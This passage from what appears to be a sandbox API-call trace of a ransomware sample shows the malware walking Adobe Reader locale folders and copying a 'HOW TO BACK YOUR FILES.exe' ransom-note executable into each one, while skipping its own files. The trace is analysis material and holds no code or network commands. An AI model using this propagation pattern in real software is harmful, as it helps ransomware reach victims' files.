10.0\\Reader\\Locale\\nb_NO\\Services" [0059.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.476] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.477] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54f3acc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54f3acc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.497] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.498] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR" [0059.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f06b0 | out: hHeap=0x2b0000) returned 1 [0059.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0059.498] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR") returned 60 [0059.498] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR" [0059.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.533] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54fd3240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54fd3240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.534] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services" [0059.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0059.534] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services") returned 69 [0059.534] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services" [0059.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.542] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.542] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54fd3240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54fd3240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.542] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.542] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP" [0059.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0628 | out: hHeap=0x2b0000) returned 1 [0059.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0059.542] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP") returned 60 [0059.542] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP" [0059.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.565] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.565] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5501f500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5501f500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.566] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.566] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services" [0059.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0059.566] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services") returned 69 [0059.566] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services" [0059.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.567] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.579] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.579] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55045660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55045660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.580] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT" [0059.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0059.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0059.580] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT") returned 60 [0059.580] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT" [0059.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55045660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55045660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.588] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services" [0059.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2480 | out: hHeap=0x2b0000) returned 1 [0059.588] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services") returned 69 [0059.588] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services" [0059.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.594] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5506b7c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5506b7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.594] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU" [0059.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0059.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0059.594] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU") returned 60 [0059.594] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU" [0059.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.602] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.602] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5506b7c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5506b7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.602] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.602] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.602] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services" [0059.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0059.603] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services") returned 69 [0059.603] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services" [0059.603] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.616] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.616] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x55091920, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55091920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.616] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.616] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.617] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR" [0059.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0059.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0059.617] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR") returned 60 [0059.617] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR" [0059.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.623] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x550b7a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x550b7a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.624] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.624] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services" [0059.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0059.624] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services") returned 69 [0059.624] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services" [0059.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.630] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x550b7a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x550b7a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.631] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.631] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR") 